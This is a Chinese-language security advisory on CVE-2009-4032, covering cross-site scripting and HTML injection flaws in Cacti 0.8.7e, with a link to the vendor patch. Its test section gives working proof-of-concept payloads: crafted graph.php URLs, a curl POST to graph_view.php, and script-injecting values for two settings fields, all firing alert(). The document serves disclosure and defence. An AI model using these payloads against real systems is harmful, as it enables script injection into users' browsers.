安全研究

安全漏洞
Cacti多个跨站脚本和HTML注入漏洞

发布日期:2009-11-21
更新日期:2009-11-27

受影响系统:
Cacti Cacti 0.8.7e
描述:
BUGTRAQ  ID: 37109
CVE(CAN) ID: CVE-2009-4032

Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。

Cacti没有正确地过滤用户提交给graph_settings.php页面的title_size、legend_size、axis_size和unit_size参数,提交给data_input.php页面的name参数,以及其他一些页面的多个参数,远程攻击者可以通过提交HTTP POST请求执行跨站脚本攻击;此外如果用户拥有通过graph_settings.php修改图形显示设置的权限,就可以通过page_refresh和default_dual_pane_width参数注入javascript。

<*来源:Moritz Naumann
  
  链接:http://marc.info/?l=full-disclosure&m=125921452816513&w=2
        http://secunia.com/advisories/37481/
        http://secunia.com/advisories/37484/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
http://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E

> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html

将page_refresh设置为:

  300'><script>alert(3)</script><x y='

将default_dual_pane_width设置为:

  200"><script>alert(3)</script><x y="

建议:
厂商补丁:

Cacti
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch

浏览次数:2318
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障